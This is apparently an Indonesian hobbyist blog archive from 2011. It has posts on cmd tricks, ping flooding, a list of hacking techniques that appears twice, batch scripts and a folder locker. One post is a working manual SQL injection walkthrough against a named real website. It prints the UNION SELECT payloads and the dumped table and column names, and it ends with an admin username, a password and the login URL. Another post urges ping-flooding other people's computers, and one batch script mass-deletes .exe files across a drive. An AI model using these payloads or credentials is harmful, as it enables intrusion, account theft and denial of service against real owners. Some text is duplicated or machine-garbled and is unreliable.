Dec 25, 2011

Memperkeren Command Prompt Komputer

Command Prompt..atau Kepanjangan dari "cmd",jika kamu tau apa itu cmd dan sangat tertarik ..maka kamu pasti ingin memperindah application atau alat tersebut,karna dari cmd itu kita bisa melakukan hal2 yang menarik,mulai dari iseng,keperluan,membuat script perusak system komputer,menghapus dual boot,bahkan mengganti password windows dan sebagainya..tapi hal-hal tadi tidak saya bahas,saya sedang ingin membahas cara memperindah cmd tersebut,

1.buka cmd tsb..dengan shortcut Run,(windows+R) lalu ketik "cmd" tanpa petik,lalu enter
maka akan keluar seperti dibawah ini

masih biasa bukan?

mari kita perindah menjadi seperti di bawah ini


Unik bukan...bagaimana caranya?

begini...
1. buka notepad..sudah tau notepad kan..cara menjalankannya ketik "notepad" pada kotak Run tadi..

2. tulis script yang seperti saya ketik di notepad ini (copas dan edit sendiri ya..)

Dec 24, 2011

Cara Menghapus Dual Boot Windows 7

Jika komputer Anda memiliki lebih dari satu sistem operasi (OS) yang terinstal secara asli di sistem, dan Windows 7 adalah salah satu dari sistem operasi tersebut, saya yakin Anda akan melihat pilihan untuk boot ke sistem operasi lain seperti “Earlier Version Of Windows” pada sistem startup.

Jadi bagaimana jika sistem operasi Windows sebelumnya (tidak peduli apakah itu Windows Vista, XP, 2000 atau bahkan edisi lebih tua) sudah dihapus dari sistem, tetapi karena beberapa masalah boot loader tidak dapat diperbarui? Pada dasarnya Anda melihat pilihan ini setiap kali saat Anda menghidupkan komputer Anda.

Berikut adalah bagaimana cara agar Anda dapat menghapus entri boot loader yang tidak perlu dan boot langsung ke Windows 7.

Pertama-tama Anda harus masuk dulu ke sistem Windows 7.

1.buka command prompt Start>>All Program>>accessories>>(klik kanan pada app command prompt dan "run as administrator")
2.Setelah Command Prompt terbuka ketikan bcdedit.

13 Rahasia Google Chrome

Kita pasti tahu browser yang satu ini. Yup, Google Chrome adalah salah satu browser yang saat ini tengah bersaing dengan browser browser besar lainnya seperti Firefox, IE, Safari, Opera dan sebagainya dalam memperoleh pengguna setia terbanyak.
Namun apakah anda sudah menggunakan Google Chrome?
Jika belum punya, anda bisa mendownload di http://www.google.com/chrome

Google Chrome adalah browser yang dikeluarkan oleh google.
Browser keluaran Google tersebut konon memiliki kemampuan dan fitur-fitur lebih canggih dibanding kompetitor.

Soal kecepatan misalnya, Google Chrome diklaim tak tertandingi oleh browser manapun.
Nah, Berikut ini saya akan memberikan beberapa rahasia yang tersembunyi di browser Google Chrome. Rahasia ini saya dapatkan ketika blogwalking. :

1.Incognito Window (Control + Shift + N)

Fitur ini memungkinkan netter untuk browsing secara aman lewat windows browser, karena dengan fitur ini netter tidak akan meninggalkan jejak seperti ‘browser & search history’ dan cookies. Jadi kalau netter tidak yakin akan situs yang dikunjungi atau tidak ingin orang lain di tempat kerja tahu netter mengunjungi sebuah situs, fitur ini tentu berguna.

2.Alt + Home atau Control + T

Menghapus Dual Boot Windows 7

Dec 7, 2011

Flooding IP Dengan cmd

heem...denger2 pada suka ngeflooding,ada yg pake cain & abel,dan software lainnya untuk memflooding komputer korban,tapi saya punya cara simple,dengan program bawaan windows,yaitu command prompt (cmd)
dengan cara memping Ip seseorang,(cara mencari IP seseorang yang berada di 1 jaringan,pke software aja biar gampang,download port scanner cari di google ya,atau klo km bisa tau cara cari tau IP seseorang sendiri ya gpp..)

Sebenarnya fungsi Ping (Packet Internet Groper) adalah untuk melihat apakah ada hubungan antara komputer yang satu dengan yang lainnya dengan cara mengirimkan sejumlah packet data


jika melakukan ping dalam keadaan standar maka data yang dikirim hanyalah sebesar 32bytes tetapi untuk membuat IP orang tersebut sibuk dengan data yang kita kirim maka data yang akan dikirim diperbesar

Nov 21, 2011

Cara Hacker Membobol Suatu Website

Hacker, tak dipungkiri kebenarannya siap menguji keamanan sistem yang dibuat. Hacker secara umum memliliki cara dan tehnik untuk hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut. Teknik-teknik itu antara lain:


1.IP Spoofing
2.FTP Attack
3.Unix Finger Exploits
4.Flooding & Broadcasting
5.Fragmented Packet Attacks
6.E-mail Exploits
7.DNS and BIND Vulnerabilities
8.Password Attacks
9.Proxy Server Attacks
10.Remote Command Processing Attacks
11.Remote File System Attack
12.Selective Program Insertions
13.Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15.HTTPD Attacks



1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.



IP Spoofing terjadi ketika seorang attacker ?mengakali? packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang



3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.



Utility ini juga Menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ?memberitahu? password dan kode akses terhadap system.



4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.



Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan



5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol



6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)



8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.



Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing

9. Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya



11. Remote File System Attack

Protocol-protokol untuk tranportasi data ?tulang punggung dari internet? adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file



12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor



13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack



14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods

Cara Hacker Membobol Suatu Website

Hacker, tak dipungkiri kebenarannya siap menguji keamanan sistem yang dibuat. Hacker secara umum memliliki cara dan tehnik untuk hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut. Teknik-teknik itu antara lain:


1.IP Spoofing
2.FTP Attack
3.Unix Finger Exploits
4.Flooding & Broadcasting
5.Fragmented Packet Attacks
6.E-mail Exploits
7.DNS and BIND Vulnerabilities
8.Password Attacks
9.Proxy Server Attacks
10.Remote Command Processing Attacks
11.Remote File System Attack
12.Selective Program Insertions
13.Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15.HTTPD Attacks



1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.



IP Spoofing terjadi ketika seorang attacker ?mengakali? packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang



3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.



Utility ini juga Menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ?memberitahu? password dan kode akses terhadap system.



4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.



Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan



5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol



6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)



8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.



Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing

9. Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya



11. Remote File System Attack

Protocol-protokol untuk tranportasi data ?tulang punggung dari internet? adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file



12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor



13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack



14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods

Nov 16, 2011

SQL Injection Manual

Target : http://www.natoleo.com/Content.php?id=14

1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com

http://www.natoleo.com/Content.php?id=14’

muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)




2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')

http://www.natoleo.com/Content.php?id=14 order by 5--


jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)




3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14


http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--

akan muncul "angka ajaib" : 1




4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.

http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--

muncul tulisan :5.0.51a-community




5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--

muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome




6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273

tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--

muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id

kita ambil : member_login,member_password



7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL

ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--


hasilnya akan muncul:

user: wilmarnatoleo

pass: natoleoP@ssword


sekarang tinggal login ke website target..

http://www.natoleo.com/admin/

Smoga berhasil ya,saya juga masih belajar..

Nov 11, 2011

Menambah Seeds di Twiends

Dsni saya akan memberikan code voucher twiends.com gratis,
dari pada capek follow org duluan bagus pake voucher gratis,
yah kan ? :D
cekidooot...




cara menggunakannya mudah kok,
tinggal masukin kode seeds anda bertambah 50. setiap 1 code berisikan 50 seeds, yh lumayanlah bsa bertambah tanpa follow org.
masukannya disini http://twiends.com/freeseeds
nnti muncul kolomnya seprti dbawah ini dan masukkan codenya.



code vouchernya antara lain:
1. G341UP
2. AX2KRZ
3. LK4W2Q
4. KE3YZ1
5. OK1SA5T
6. 54MU1W
7. ntr ane update klo dapat code yang lain

SEMOGA BERMANFAAT...
thanks...

Oct 15, 2011

Menghapus virus dengan notepad

Cara menghapus virus dengan notepad.

ketik script di bwh..dengan notepad,lalu save dengan ekstensi .bat
misal Antivirus.bat
=====================================================
@echo off
echo matiin proses virus_Nya
taskkill /F /IM namavirus1.exe /IM namavirus2.exe
echo apus Semua virus_Nye berdasarkan ukuran
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del
/A: H S R A “%%a”
echo apus virus yang Nyamar
echo untuk drive c N subfolder_Nya
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo untuk drive d N subfolder_Nya
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo Ngembaliin Document yang diHidden
cd /d c:\
echo untuk drive C N subfolder_Nya
attrib *.doc -H -S -A /S
cd /d d:\
echo untuk drive D N subfolder_Nya
attrib *.doc -H -S -A /S
exit
====================================================

namavirus1.exe dapat diganti dengan nama virus berekstensi.exe yang anda temukan.
masih bingung...praktekan dan buat penelitian..

good luck!

Oct 10, 2011

Membuka File Terhidden Dengan Notepad

Ketik ini aja di Notepad nya...

@echo off
attrib -s -h */s/d

Klik File => Save as => All files
Gunakan extensi .bat contoh: my-antivirs.bat

Maksud dari perintah diatas:

echo : berfungsi untuk menampilkan pesan, keterangan atau komentar oleh user, ketika berada dalam kondisi-kondisi tertentu.
Attrib : merupakan perintah dasar yang di gunakan untuk mengatur atribut suatu file.
-s : setelah attrib ditujukan untuk mencabut atau melepas system file.
-h : ditujukan untuk mencabut atau melepas hidden file.
* : mewakili semua file.
/s : melakukan pencarian file sesuai dengan nama yang di tentukan dalam suatu folder hingga ke sub-sub foldernya (bila ada).
/d : biasa di gunakan unuk mendampingi penggunaan “/s”
Nah, sekarang kan, kita jadi bisa bantu temen yang file-file pentingnya ke hidden bisa jadi nggak ke hidden lagi...
Selamat Mencoba!!!

Sep 11, 2011

Materi pembelajaran bahasa HTML

Hai Guys...ada yang tertarik sma HTML ya?
bikin website pke HTML bisa lho...
kepanjangan HTML adalah "Hyper Text Markup Language"

tapi agak susah mempelajarinya...jadi harus sabar ya..
skrng langsung aja download disini untuk materinya

di dalamnya saya sertakan RARpasswordrecovery gunanya untuk mencari password file.rar tsb
tapi saya sudah sediakan password'a berupa text..gunakan software rarcracek untuk keperluan ya
semoga berguna

semoga berhasil..dan semoga sukses..baca lagi artikel saya yang lain ya

Sep 10, 2011

Membuat Folder Prifasi dengan script


Wah, Judul yang terasa berat euy, Cara Mengunci Folder Tanpa Software. yah, memang itulah kenyataan yang tidak bisa dipungkiri dari judul artikel kali ini. walaupun terasa berat karena agak berbobot, akhirnya saya beranikan diri untuk menulis artikel ini. Seperti yang kita tahu, cara mudah nya si untuk memberikan sebuah pasword pada interpretation yang penting kita melakukan compresed record melalui record zip ataupun rar. itu memang cara mudahnya. tapi dalam educational kali ini, kita akan bermain dalam cara mengunci printed matter tanpa software dengan dimaksudkan dalam printed matter itu ada interpretation penting yang oleh orang tidak boleh melihatnya.Oke, mungkin tidak banyak cingcong lagi, takutnya anda ini merasa bosan dengan tulisan saya ini, karena tulisan saya ini agak ngawur dan gak jelas.

Oke, langsung saja cara Mengunci printed matter tanpa Software yaitu :


1. Buatlah sebuah notepad kosong atau brand brand new content document.txt di office mana saja di mechanism atau laptop anda. Anda boleh memberi nama apa saja untuk brand brand new content request tersebut.

2. Setelah itu anda tinggal meng-copy book yang telah saya sediakan di bawah ini :
=====================================Start=====================================
cls
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are we certain we wish to Lock a folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter cue to Unlock folder
set/p “pass=>”
if NOT %pass%==type your cue here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker combined successfully
goto End
:End
========================================End========================================
..
3. Setelah anda selesai meng-copy, buka kembali notepad yang telah anda buat tadi dan Paste script ini di dalamnya.

4. buka notepad tadi dan ganti kata type your cue here dengan cue untuk membuka printed matter pada nantinya dan setelah selesai simpan script-nya dan ubah ekstensi record yang telah terdapat book tersebut dari ekstensi record ***.txt menjadi ***.bat

5. Double klik pada record tersebut dan beberapa detik kemudian akan muncul sebuah printed matter yang bernama Locker .

6. Simpanlah file-file anda yang ingin anda kunci di dalam printed matter yang bernama locker tersebut. Di dalam printed matter tersebut bisa kita letakkan record apa saja yang kita inginkan dengan ekstensi record yang berbeda. Baik itu record gambar, music, video, document, dan file-file lainnya.

7. Setelah semua record yang diinginkan tersimpan. Double klik pada book di notepad yang telah anda buat menjadi ***.bat . Lalu akan muncul tulisan are we certain wish to close a folder?(Y/N). Ketik “y” dan tekan come in untuk yes dan ketik “n” lalu tekan come in untuk no. Sekedar informasi tulisan are we certain wish to close a folder? yang ada pada book awal (default) bisa kita ubah sesuai keinginan kita. Seperti : apakah saudara yakin ingin mengunci printed matter ini? dan sebagainya.

8. Jika yang anda simpan adalah record penting, usahakan record yang anda simpan ini jangan sampai didelete oleh orang lain. Anda bisa mengantisipasinya dengan mengaktifkan fasilitas hidden record dan tidak menampakkan file-file yang ter-hidden sehingga orang lain tidak bisa menghapus record anda.

